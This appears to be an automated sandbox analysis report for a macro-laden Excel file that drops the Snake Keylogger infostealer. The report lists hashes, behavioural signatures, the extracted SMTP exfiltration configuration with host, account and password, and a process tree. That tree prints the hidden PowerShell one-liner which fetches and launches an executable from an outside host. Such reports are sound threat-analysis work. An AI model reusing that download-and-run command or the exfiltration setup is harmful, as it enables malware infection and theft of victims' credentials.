Analysis
-
max time kernel
134s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
25-11-2024 13:58
Behavioral task
behavioral1
Sample
b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsm
Resource
win10v2004-20241007-en
General
-
Target
b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsm
-
Size
438KB
-
MD5
9bf51f7bdf35911324a4fbb9235090f7
-
SHA1
d1abcb2b543a4c0f308dade69d1be6a96f356a3b
-
SHA256
b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025
-
SHA512
c678628535508e250605babc13d899c598ab1466294b7917d583b577fb5362346b47952d684622c445512753980329ecc513934a7391b7511f7fc1588d981aff
-
SSDEEP
12288:Zl3PBexJxH0cZtSlOSgjG3IWNqAvfTYxv25F3:Z5PBexJJF2cSwG4ofTn55
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
juguly.shop - Port:
587 - Username:
[email protected] - Password:
rEBS93U9rKLG - Email To:
[email protected]
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 432 1016 powershell.exe 81 -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/5324-1235-0x0000000000610000-0x0000000000636000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1604 created 3436 1604 tmpAC8C.exe 56 -
Blocklisted process makes network request 1 IoCs
flow pid Process 26 432 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 432 powershell.exe 432 powershell.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svcost.vbs tmpAC8C.exe -
Executes dropped EXE 1 IoCs
pid Process 1604 tmpAC8C.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 44 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1604 set thread context of 5324 1604 tmpAC8C.exe 96 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tmpAC8C.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1016 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 432 powershell.exe 432 powershell.exe 1604 tmpAC8C.exe 5324 InstallUtil.exe 5324 InstallUtil.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 432 powershell.exe Token: SeDebugPrivilege 1604 tmpAC8C.exe Token: SeDebugPrivilege 1604 tmpAC8C.exe Token: SeDebugPrivilege 5324 InstallUtil.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
pid Process 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE 1016 EXCEL.EXE -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 1016 wrote to memory of 432 1016 EXCEL.EXE 85 PID 1016 wrote to memory of 432 1016 EXCEL.EXE 85 PID 432 wrote to memory of 1604 432 powershell.exe 94 PID 432 wrote to memory of 1604 432 powershell.exe 94 PID 432 wrote to memory of 1604 432 powershell.exe 94 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 PID 1604 wrote to memory of 5324 1604 tmpAC8C.exe 96 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 InstallUtil.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3436
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\b416b3cd07533aa1e3f322bbf904be65df03dcf08507ef9a683271a3c4848025.xlsm"2⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1016 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri "https://cia.tf/2ed7362e959d42385d4e6d231a6840dd.exe" -OutFile $TempFile; Start-Process $TempFile;3⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Users\Admin\AppData\Local\Temp\tmpAC8C.exe"C:\Users\Admin\AppData\Local\Temp\tmpAC8C.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1604
-
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:5324
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.0MB
MD52ed7362e959d42385d4e6d231a6840dd
SHA1b3cc47ac92296d978fc991d9658c771f225dbf18
SHA25613cb2135790780947be355c3c9ed42be1987c9e64d6cd0c43a5a4c5ae289dc30
SHA51266553bb74d63e2d8bb47751f87f93dee66c4acbe647115dea5148d6b301f0a6802ae972a3fc26c1bcf9412775f1fbfd6238c1b477f726e0386cdef183551b758
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
Filesize1KB
MD53fcb3de852b16407344d48c18adeae52
SHA149099217b0caffbd0c8634a48bc0781f7224d6e2
SHA256ec68d0056d338350f414a3a6718140a5ff92c62517f6aef5b55d1dfc56b24645
SHA512dc6667fed3fac7538e4c0590c5c3713c3ec91896cebf8109023bb19b58e4a9ae77a932c8d87757f907f26e49fdb5bc1190ec9e11e7c80e782d4250531a7cacb6